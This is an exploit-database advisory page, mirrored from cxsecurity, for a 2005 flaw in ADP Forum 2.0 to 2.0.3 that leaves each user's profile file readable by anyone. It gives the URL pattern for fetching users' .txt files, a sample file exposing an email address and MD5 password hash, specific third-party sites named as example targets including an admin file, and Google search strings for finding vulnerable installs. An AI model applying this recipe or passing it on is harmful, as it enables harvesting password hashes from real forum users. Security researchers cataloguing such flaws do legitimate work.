ADP Forum 2.0,ADP Forum 2.0.1,ADP Forum 2.0.2,ADP Forum 2.0.3 versiyon user md5 hash bug
CVE
Category
Price
Severity
CWE-287
Not specified
High
Author
Risk
Exploitation Type
Date
Not specified
High
Remote
2005-12-14
CPE
cpe:cpe:/a:adp:forum:2.0, cpe:/a:adp:forum:2.0.1, cpe:/a:adp:forum:2.0.2, cpe:/a:adp:forum:2.0.3
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005120033 Below is a copy:ADP Forum 2.0,ADP Forum 2.0.1,ADP Forum 2.0.2,ADP Forum 2.0.3 versiyon user md5 hash bug
----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.e-stamp.ru/forum203/
--------------------------------------------------
http://target.com/pacth/users/username.txt
----------------------------------------------------
username.txt file
username
Master Member
52
images/avatars/1037850652.jpg
http://www.website.com
wamp (at) website (dot) com [email concealed]
176311476
20-11-2002
username
1f8c48c0c6e421b907e72ab6d4aa8ca9
1037850652
--------------------------------------------------------
example:
http://www.wamp.ca/forum/users/Paul.txt
http://www.wamp.ca/forum/users/javadog.txt
http://www.e-stamp.ru/forum203/users/admin.txt
vs..
---------------------------------------------------------
Credit:Liz0ziM
mail:liz0 (at) bsdmail (dot) com [email concealed]
www.biyo.tk,www.cehennem.org
-----------------------------------------------------------
http://www.blogcu.com/Liz0ziM/144336/
http://biyo.5gigs.com/adpforum.txt
------------------------------------------------------------
google:
"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum